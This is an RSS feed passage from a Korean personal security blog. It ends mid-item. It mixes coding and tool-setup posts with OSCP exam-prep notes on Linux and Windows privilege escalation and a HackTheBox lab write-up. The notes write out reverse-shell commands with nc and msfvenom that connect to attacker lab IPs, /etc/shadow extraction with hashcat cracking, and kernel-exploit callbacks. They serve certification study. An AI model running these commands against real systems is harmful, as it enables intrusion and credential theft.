<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
  <channel>
    <title>Elbrown</title>
    <link>https://myreversing.tistory.com/</link>
    <description>지극히 개인적인 개념정리 블로그</description>
    <language>ko</language>
    <pubDate>Tue, 14 Apr 2026 19:19:50 +0900</pubDate>
    <generator>TISTORY</generator>
    <ttl>100</ttl>
    <managingEditor>우와해커</managingEditor>
    <image>
      <title>Elbrown</title>
      <url>https://tistory1.daumcdn.net/tistory/3495739/attach/7c8ef4b9ef0d4e0e810ed1c041d786b3</url>
      <link>https://myreversing.tistory.com</link>
    </image>
    <item>
      <title>[프로젝트] 인프라진단 Copy&amp;amp;Paste 스크립트</title>
      <link>https://myreversing.tistory.com/563</link>
      <description>&lt;p&gt;&lt;a href=&quot;https://github.com/bbakbbak2/InfraProject&quot;&gt;https://github.com/bbakbbak2/InfraProject&lt;/a&gt;&lt;/p&gt;
&lt;figure id=&quot;og_1612233590346&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-og-type=&quot;object&quot; data-og-title=&quot;bbakbbak2/InfraProject&quot; data-og-description=&quot;노가다 시간 줄이기 위한 자동화 스크립트 ㅠ.ㅠ. Contribute to bbakbbak2/InfraProject development by creating an account on GitHub.&quot; data-og-host=&quot;github.com&quot; data-og-source-url=&quot;https://github.com/bbakbbak2/InfraProject&quot; data-og-url=&quot;https://github.com/bbakbbak2/InfraProject&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/gKOS8/hyI8RkAbEU/DJssapyMkcAyWWK9s3TCBK/img.png?width=420&amp;amp;height=420&amp;amp;face=0_0_420_420&quot;&gt;&lt;a href=&quot;https://github.com/bbakbbak2/InfraProject&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://github.com/bbakbbak2/InfraProject&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/gKOS8/hyI8RkAbEU/DJssapyMkcAyWWK9s3TCBK/img.png?width=420&amp;amp;height=420&amp;amp;face=0_0_420_420');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot;&gt;bbakbbak2/InfraProject&lt;/p&gt;
&lt;p class=&quot;og-desc&quot;&gt;노가다 시간 줄이기 위한 자동화 스크립트 ㅠ.ㅠ. Contribute to bbakbbak2/InfraProject development by creating an account on GitHub.&lt;/p&gt;
&lt;p class=&quot;og-host&quot;&gt;github.com&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>Python</category>
      <category>꿀팁</category>
      <category>스크립트진단</category>
      <category>엑셀</category>
      <category>인프라진단</category>
      <category>인프라프로젝트</category>
      <category>자동화</category>
      <category>취약점진단</category>
      <category>컨설팅</category>
      <author>우와해커</author>
      <guid isPermaLink="true">https://myreversing.tistory.com/563</guid>
      <comments>https://myreversing.tistory.com/563#entry563comment</comments>
      <pubDate>Tue, 2 Feb 2021 11:41:03 +0900</pubDate>
    </item>
    <item>
      <title>강의 사이트</title>
      <link>https://myreversing.tistory.com/430</link>
      <description>&lt;p&gt;&lt;b&gt;expressJS - semantic UI&lt;/b&gt;&lt;/p&gt;&lt;p&gt;https://www.npmjs.com/package/express-semantic-ui&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;semantic UI 생활코딩 강좌&lt;/b&gt;&lt;/p&gt;&lt;p&gt;https://www.youtube.com/watch?v=Gsn1heIn2V8&amp;amp;list=PLuHgQVnccGMDUIlVEAZPjYq4Y2idO-O07&amp;amp;index=2&lt;/p&gt;&lt;p&gt;pm2&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;코드랩 expressJS&lt;/b&gt;&lt;/p&gt;&lt;p&gt;https://jeonghwan-kim.github.io/series/2018/12/01/node-web-1_orientation.html&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;생활코딩 expressJS(완강)&lt;/b&gt;&lt;/p&gt;&lt;p&gt;https://opentutorials.org/course/3370/21378&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;생활코딩 NodeJS-MySQL(완강)&lt;/b&gt;&lt;/p&gt;&lt;p&gt;https://opentutorials.org/course/3347&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;GIT&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://www.zerocho.com/category/Git/post/580f633046f4fe09815b72a5&quot;&gt;https://www.zerocho.com/category/Git/post/580f633046f4fe09815b72a5&lt;/a&gt;&lt;/p&gt;</description>
      <category>NodeJS</category>
      <author>우와해커</author>
      <guid isPermaLink="true">https://myreversing.tistory.com/430</guid>
      <comments>https://myreversing.tistory.com/430#entry430comment</comments>
      <pubDate>Wed, 14 Oct 2020 17:46:20 +0900</pubDate>
    </item>
    <item>
      <title>vim javascript 코딩설정</title>
      <link>https://myreversing.tistory.com/429</link>
      <description>&lt;p&gt;&lt;a href=&quot;https://maxim-danilov.github.io/vim-to-js-ide/&quot;&gt;https://maxim-danilov.github.io/vim-to-js-ide/&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&quot; https://github.com/pangloss/vim-javascript&lt;/p&gt;&lt;p&gt;set nocompatible&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &quot; be iMproved, required&lt;/p&gt;&lt;p&gt;filetype off&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &quot; required&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&quot; set the runtime path to include Vundle and initialize&lt;/p&gt;&lt;p&gt;set rtp+=~/.vim/bundle/Vundle.vim&lt;/p&gt;&lt;p&gt;call vundle#begin()&lt;/p&gt;&lt;p&gt;&quot; alternatively, pass a path where Vundle should install plugins&lt;/p&gt;&lt;p&gt;&quot;call vundle#begin('~/some/path/here')&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Plugin 'VundleVim/Vundle.vim'&lt;/p&gt;&lt;p&gt;Plugin 'tpope/vim-fugitive'&lt;/p&gt;&lt;p&gt;Plugin 'git://git.wincent.com/command-t.git'&lt;/p&gt;&lt;p&gt;Plugin 'rstacruz/sparkup', {'rtp': 'vim/'}&lt;/p&gt;&lt;p&gt;Plugin 'pangloss/vim-javascript'&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&quot;Lint&lt;/p&gt;&lt;p&gt;Plugin 'w0rp/ale'&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&quot;Auto Complate&lt;/p&gt;&lt;p&gt;&quot;Plugin 'Valloric/YouCompleteMe'&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&quot; Add color scheme Ych&lt;/p&gt;&lt;p&gt;Plugin 'larsbs/vimterial_dark'&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&quot; Filre Explorer&lt;/p&gt;&lt;p&gt;Plugin 'scrooloose/nerdtree'&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&quot; System Clipboard&lt;/p&gt;&lt;p&gt;Plugin 'christoomey/vim-system-copy'&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;call vundle#end()&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &quot; required&lt;/p&gt;&lt;p&gt;filetype plugin indent on&amp;nbsp; &amp;nbsp; &quot; required&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&quot; NERDTress Ctrl+n&lt;/p&gt;&lt;p&gt;map &amp;lt;C-n&amp;gt; :NERDTreeToggle&amp;lt;CR&amp;gt;&lt;/p&gt;&lt;p&gt;&quot;&amp;nbsp; NERDTress File highlighting&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&quot;install theme https://github.com/larsbs/vimterial_dark&lt;/p&gt;&lt;p&gt;syntax on&lt;/p&gt;&lt;p&gt;let &amp;amp;t_8f = &quot;\&amp;lt;Esc&amp;gt;[38;2;%lu;%lu;%lum&quot;&lt;/p&gt;&lt;p&gt;let &amp;amp;t_8b = &quot;\&amp;lt;Esc&amp;gt;[48;2;%lu;%lu;%lum&quot;&lt;/p&gt;&lt;p&gt;set termguicolors&lt;/p&gt;&lt;p&gt;colorscheme vimterial_dark&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;set ts=2&lt;/p&gt;&lt;p&gt;set nu&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;</description>
      <category>TOOL설치</category>
      <author>우와해커</author>
      <guid isPermaLink="true">https://myreversing.tistory.com/429</guid>
      <comments>https://myreversing.tistory.com/429#entry429comment</comments>
      <pubDate>Sat, 10 Oct 2020 15:33:43 +0900</pubDate>
    </item>
    <item>
      <title>Linux privsec 테크닉</title>
      <link>https://myreversing.tistory.com/423</link>
      <description>&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;리눅스 manual 테크닉&lt;/p&gt;&lt;p&gt;https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_-_linux.html&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Kernel exploits&lt;/p&gt;&lt;p&gt;-다른 쳅터 참고&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Programs running as root&lt;/p&gt;&lt;p&gt;&amp;gt;ps aux&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Mysql root로 실행중이고 디비 접속 가능하다면 쉘 실행가능&lt;/p&gt;&lt;p&gt;select sys_exec('whoami');&lt;/p&gt;&lt;p&gt;select sys_eval('whoami');&lt;/p&gt;&lt;p&gt;+User Defined function&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Installed software&lt;/p&gt;&lt;p&gt;- 설치되는 폴더가 넘 광범위함, 스크립트를 활용하거나 dpkg만....&lt;/p&gt;&lt;p&gt;# Debian&lt;/p&gt;&lt;p&gt;dpkg -l&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Weak/reused/plaintext passwords&lt;/p&gt;&lt;p&gt;- DB가 저장된 웹소스, 설정파일 찾아보기&lt;/p&gt;&lt;p&gt;- DB에 저장된 계정의 비밀번호가 서버의 계정 비번으로 재사용되는지 체크&lt;/p&gt;&lt;p&gt;- /var/spool/mail(메일박스 뒤져보기)&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Inside service (내부망만 접근 가능한 서비스)&lt;/p&gt;&lt;p&gt;해당 호스트에서만 사용할 수 있는 일부 서비스를 실행 중일 수 있습니다. 외부에서 서비스에 연결할 수 없습니다.&amp;nbsp;&lt;/p&gt;&lt;p&gt;개발 서버, 데이터베이스 또는 다른 것이 될 수 있습니다. 이러한 서비스는 루트로 실행 중이거나 취약점이 있을 수 있습니다.&amp;nbsp;&lt;/p&gt;&lt;p&gt;- netstat를 확인하고 외부에서 수행 한 nmap-scan과 비교하십시오. 내부에서 더 많은 서비스를 찾을 수 있습니까?&lt;/p&gt;&lt;p&gt;# Linux&lt;/p&gt;&lt;p&gt;netstat -anlp&lt;/p&gt;&lt;p&gt;netstat -ano&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Suid misconfiguration&lt;/p&gt;&lt;p&gt;소유자 root, setuid 설정, 쉘전환 기능 있는 프로그램 또는 명령어도 공격될 수 있음&lt;/p&gt;&lt;p&gt;nmap, vim, less, more, nano, cp, mv, find&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Abusing sudo-rights&lt;/p&gt;&lt;p&gt;&amp;gt;sudo -l 사용하여 exploit&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;World writable scripts invoked by root&lt;/p&gt;&lt;p&gt;- root에 의해 실행되는 스크립트, 일반유저가 편집이 가능한지&lt;/p&gt;&lt;p&gt;- 리버스쉘 스크립트로 편집하여 Exploit&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Bad path configuration&lt;/p&gt;&lt;p&gt;- 바이너리의 path경로에 .이 존재&lt;/p&gt;&lt;p&gt;- Strings로 바이너리 문자열 체크&lt;/p&gt;&lt;p&gt;- PATH 변수 편집하여 tmp폴더에서 페이로드 실행되도록 만들기&lt;/p&gt;&lt;p&gt;- export PATH=.;$PATH&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Cronjobs&lt;/p&gt;&lt;p&gt;- 아래 외에 봐야할 폴더가 더 있음, 스크립트로 체크하자.&lt;/p&gt;&lt;p&gt;crontab -l&lt;/p&gt;&lt;p&gt;ls -alh /var/spool/cron&lt;/p&gt;&lt;p&gt;ls -al /etc/ | grep cron&lt;/p&gt;&lt;p&gt;ls -al /etc/cron*&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Unmounted filesystems&lt;/p&gt;&lt;p&gt;- 언마운트된 시스템을 찾은 후 다시 마운트하여 권한상승 될만한것을 찾아 볼 수 있음&lt;/p&gt;&lt;p&gt;&amp;gt; mount -l&lt;/p&gt;&lt;p&gt;&amp;gt; cat /etc/fstab&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;NFS Share&lt;/p&gt;&lt;p&gt;- NFS에 root_sqush같은 설정이 존재하면 원격 root 이름으로 파일 생성이 가능함&lt;/p&gt;&lt;p&gt;# First check if the target machine has any NFS shares&lt;/p&gt;&lt;p&gt;showmount -e 192.168.1.101&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;# If it does, then mount it to you filesystem&lt;/p&gt;&lt;p&gt;mount 192.168.1.101:/ /tmp/&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;World writable directorie&lt;/p&gt;&lt;p&gt;- 파일업로드 위치로 사용하면 됨&lt;/p&gt;&lt;p&gt;/tmp&lt;/p&gt;&lt;p&gt;/var/tmp&lt;/p&gt;&lt;p&gt;/dev/shm&lt;/p&gt;&lt;p&gt;/var/spool/vbox&lt;/p&gt;&lt;p&gt;/var/spool/samba&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Privilege Escalation - Weak File Permissions&lt;/p&gt;&lt;p&gt;- 파일을 읽을 수 있고 Hash가 존재하는 경우&lt;/p&gt;&lt;p&gt;&amp;gt;cat /etc/passwd (마우스로 copy&amp;amp;pate로 로컬에 복사)&lt;/p&gt;&lt;p&gt;&amp;gt;cat /etc/shadow (마우스로 copy&amp;amp;pate로 로컬에 복사)&lt;/p&gt;&lt;p&gt;# unbshadow로 병합 후 브루트포싱&lt;/p&gt;&lt;p&gt;&amp;gt; unshadow &amp;lt;PASSWORD-FILE&amp;gt; &amp;lt;SHADOW-FILE&amp;gt; &amp;gt; unshadowed.txt&lt;/p&gt;&lt;p&gt;&amp;gt; hashcat -m 1800 unshadowed.txt rockyou.txt -O&lt;/p&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Remote port forwarding&lt;/p&gt;&lt;p&gt;원격 포트 포워딩은 미쳤지만 매우 간단한 개념입니다.&lt;/p&gt;&lt;p&gt;당신은 컴퓨터에 접근했고 컴퓨터가 MYSQL처럼 실행 중이지만 localhost에서만 액세스 할 수 있다고 가정 해보십시오.&amp;nbsp;&lt;/p&gt;&lt;p&gt;당신은 엉터리 shell을 가지고 있기 때문에 그것에 접근 할 수 없습니다.&amp;nbsp;&lt;/p&gt;&lt;p&gt;그래서 우리가 할 수있는 것은 그 포트를 공격하는 컴퓨터로 전달하는 것입니다.&amp;nbsp;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;파이썬이 설치되어있는 경우 (sshuttle을 사용해 리모트 포트포워딩을 손쉽게 셋팅할 수 있음)&lt;/p&gt;&lt;p&gt;sshuttle -r root@192.168.1.101 192.168.1.0/24&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;plink 사용&lt;/p&gt;&lt;p&gt;plink.exe -l root -pw mysecretpassword 192.168.0.101 -R 8080:127.0.0.1:8080&lt;/p&gt;</description>
      <category>OSCP/시험대비</category>
      <author>우와해커</author>
      <guid isPermaLink="true">https://myreversing.tistory.com/423</guid>
      <comments>https://myreversing.tistory.com/423#entry423comment</comments>
      <pubDate>Tue, 29 Sep 2020 14:18:42 +0900</pubDate>
    </item>
    <item>
      <title>Windows privsec 테크닉</title>
      <link>https://myreversing.tistory.com/416</link>
      <description>&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;https://medium.com/bugbountywriteup/privilege-escalation-in-windows-380bee3a2842&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;*주목해야할 권한 주체&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;Authenticated User&lt;/p&gt;&lt;p&gt;NT AUTHORITY\INTERACTIVE&lt;/p&gt;&lt;p&gt;BUILTIN\Users(로그인 사용자)&lt;/p&gt;&lt;p&gt;Everyone&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;스크립트마다 누락된 사항이 있을 수 있기 때문에 &lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;&lt;b&gt;여러개를 돌려봐야함,&lt;/b&gt;&lt;/span&gt; 수동으로 찾아보는 것도 추천된다.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Sherlock (Deprecated) =&amp;gt; Watsons 사용할 것&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://github.com/rasta-mouse/Watson&quot;&gt;https://github.com/rasta-mouse/Watson&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;커맨드창에서 파워 쉘 실행 옵션&lt;/p&gt;&lt;pre style=&quot;box-sizing: border-box; font-family: SFMono-Regular, Consolas, &amp;quot;Liberation Mono&amp;quot;, Menlo, monospace; font-size: 13.6px; margin-top: 0px; margin-bottom: 16px; overflow-wrap: normal; padding: 16px; overflow: auto; line-height: 1.45; background-color: rgb(246, 248, 250); border-radius: 6px; color: rgb(36, 41, 46);&quot;&gt;&lt;code style=&quot;box-sizing: border-box; font-family: SFMono-Regular, Consolas, &amp;quot;Liberation Mono&amp;quot;, Menlo, monospace; padding: 0px; margin: 0px; background: initial; border-radius: 6px; word-break: normal; border: 0px; display: inline; overflow: visible; line-height: inherit; overflow-wrap: normal;&quot;&gt;powershell -noprofile -nologo -ep bypass -file WindowsEnum.ps1&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;* RDP허용? O, 저장된 패스워드 발견? O =&amp;gt; Test&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;저장된 패스워드 발견? 해당 유저로 nc 리버스 연결&lt;/b&gt;&lt;/p&gt;&lt;p&gt;PS&amp;gt; $secpasswd = ConvertTo-SecureString &quot;password321&quot; -AsPlainText -Force&lt;/p&gt;&lt;p&gt;$mycreds = New-Object System.Management.Automation.PSCredential (&quot;john&quot;, $secpasswd)&lt;/p&gt;&lt;p&gt;$computer = &quot;GHOST&quot;&lt;/p&gt;&lt;p&gt;[System.Diagnostics.Process]::Start(&quot;C:\users\public\nc.exe&quot;,&quot;192.168.0.114 4444 -e cmd.exe&quot;, $mycreds.Username, $mycreds.Password, $computer)&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;PS&amp;gt; cmdkey /list&lt;/p&gt;&lt;p&gt;=&amp;gt; 엔트리 반환? Windows에 자신의 자격 증명을 저장한 특정 사용자로 실행할 수 있음을 의미합니다.&lt;/p&gt;&lt;p&gt;=&amp;gt; Administrator? 권한상승하여 프로그램 실행 가능&lt;/p&gt;&lt;p&gt;runas /savecred /user:도메인\Administrator &quot;c:\windows\system32\cmd.exe /c \IP\share\nc.exe -nv 10.10.14.2 80 -e cmd.exe&quot;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;OS가 정기적으로 업데이트되면 이러한 익스플로잇은 큰 도움이되지 않습니다.&amp;nbsp;&lt;/p&gt;&lt;p&gt;Watson을 사용하여 누락 된 패치로 인한 취약성을 확인할 수 있습니다.&amp;nbsp;&lt;/p&gt;&lt;p&gt;Watson은 이미 winPEAS와 통합되어 있습니다.&amp;nbsp;&lt;/p&gt;&lt;p&gt;취약점을 발견 한 경우 아래 저장소에서 동일하게 다운로드 할 수 있습니다.&amp;nbsp;&lt;/p&gt;&lt;p&gt;대상에 맞는 아키텍처를 다운로드했는지 확인하십시오.&amp;nbsp;&lt;/p&gt;&lt;p&gt;바이너리를 컴파일해야하는 경우 Kali를 사용하여 크로스 컴파일 할 수 있습니다.&lt;/p&gt;&lt;p&gt;https://github.com/SecWiki/windows-kernel-exploits&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://github.com/abatchy17/WindowsExploits&quot;&gt;https://github.com/abatchy17/WindowsExploits&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;Weak Service Permissions&lt;/b&gt;&lt;/p&gt;&lt;p&gt;* &lt;b&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;Authenticated users그룹&lt;/span&gt;&lt;/b&gt;이 서비스에 SERVICE_ALL_ACCESS를 가지고 있으면 서비스에서 실행중인 바이너리를 수정할 수 있습니다.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;* &lt;b&gt;서비스 취약점 악용할때, 페이로드 포멧이 exe-service&lt;/b&gt;가 아니면 persistant쉘이 생성되지 않는다고 한다.&lt;/p&gt;&lt;p&gt;msfvenom -p windows/shell_reverse_tcp LPORT=31337 LHOST=YOURIPHERE -f exe-service &amp;gt; shell.exe&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;Weak Registry Permission&lt;/b&gt;&lt;/p&gt;&lt;p&gt;HKLM\SYSTEM\CurrentControlSet\Services\&amp;lt;service_name&amp;gt;&lt;/p&gt;&lt;p&gt;* Authenticated User 또는 NT AUTHORITY\INTERACTIVE가 서비스에 대해 FullControl을 가지고있는 경우 이 경우 서비스에서 실행될 바이너리를 변경할 수 있습니다.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;Autorun&lt;/b&gt;&lt;/p&gt;&lt;p&gt;- 계속 의문이였던 사항인데, 권한상승을 위한 마지막 조건은 &lt;b&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;로그오프 후에 Admin그룹에 존재하는 유저로 로그인되야 한다.&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;Tater / Hot Potato&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&quot;Hot Potato (일명 : Potato)는 Windows의 알려진 문제를 활용하여 기본 구성, 즉 NTLM 릴레이 (특히 HTTP-&amp;gt; SMB 릴레이) 및 NBNS 스푸핑에서 로컬 권한 에스컬레이션을 얻습니다.&quot;&lt;/p&gt;&lt;p&gt;https://github.com/foxglovesec/Potato/tree/master/source/Potato/Potato/bin/Release&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;Token Manipulation&lt;/b&gt;&lt;/p&gt;&lt;p&gt;침투 테스트 계약에서 침투 테스터가 Apache, IIS, SQL, MySQL 등과 같은 서비스를 손상시킬 수있는 경우가 많습니다. 안타깝게도 이 서비스는 로컬 시스템이나 권한이 높은 계정으로 실행되지 않고 네트워크 서비스로 실행됩니다. 다음 익스플로잇을 사용하여 권한을 높일 수 있습니다.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;1. Rotten Potato: Privilege Escalation from Service Accounts to SYSTEM&lt;/b&gt;&lt;/p&gt;&lt;p&gt;https://github.com/breenmachine/RottenPotatoNG&lt;/p&gt;&lt;p&gt;https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/&lt;/p&gt;&lt;p&gt;- 일반적으로 미터프리터를 이용했으나 &lt;b&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;RottenPotatoNG는 standalone exe파일을 제공한다.&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;2. Juicy Potato&lt;/b&gt;&lt;/p&gt;&lt;p&gt;https://github.com/ohpe/juicy-potato/releases&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;meterpreter&amp;gt; getsystem&lt;/p&gt;</description>
      <category>OSCP/시험대비</category>
      <author>우와해커</author>
      <guid isPermaLink="true">https://myreversing.tistory.com/416</guid>
      <comments>https://myreversing.tistory.com/416#entry416comment</comments>
      <pubDate>Mon, 28 Sep 2020 16:31:18 +0900</pubDate>
    </item>
    <item>
      <title>[Windows] Batard</title>
      <link>https://myreversing.tistory.com/407</link>
      <description>&lt;p&gt;&lt;b&gt;Bastard&lt;/b&gt;&lt;/p&gt;&lt;p&gt;- Drupal 취약점 코드 어떻게 실행할 것인지&lt;/p&gt;&lt;p&gt;- 파워 쉘 스크립트 실행 제약&lt;/p&gt;&lt;p&gt;=&amp;gt; powerless.bat, jaws-enum.ps1&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;Systeminfo&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;서비스팩 버전이 낮거나 없거나 핫픽스가 없을 경우 GOOD&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;Hotfix: N/A&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;lt;= 커널 권한상승 가능성 높음&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;color: rgb(0, 0, 0);&quot;&gt;반대로 Hotfix 업데이트가 많은 경우 &amp;lt;= 커널 가능성 낮음, misconfig 설정을 찾을 것&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;Precompiled Binary&lt;/b&gt;&lt;/p&gt;&lt;p&gt;https://github.com/SecWiki/windows-kernel-exploits&lt;/p&gt;&lt;p&gt;https://github.com/SecWiki/linux-kernel-exploits&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;c:\inetpub\drupal-7.54&amp;gt;MS10-059.exe 10.10.14.37 7777&lt;/p&gt;</description>
      <category>OSCP/HackTheBox</category>
      <author>우와해커</author>
      <guid isPermaLink="true">https://myreversing.tistory.com/407</guid>
      <comments>https://myreversing.tistory.com/407#entry407comment</comments>
      <pubDate>Sun, 27 Sep 2020 17:42:21 +0900</pubDate>
    </item>
    <item>
      <title>[Windows] Access</title>
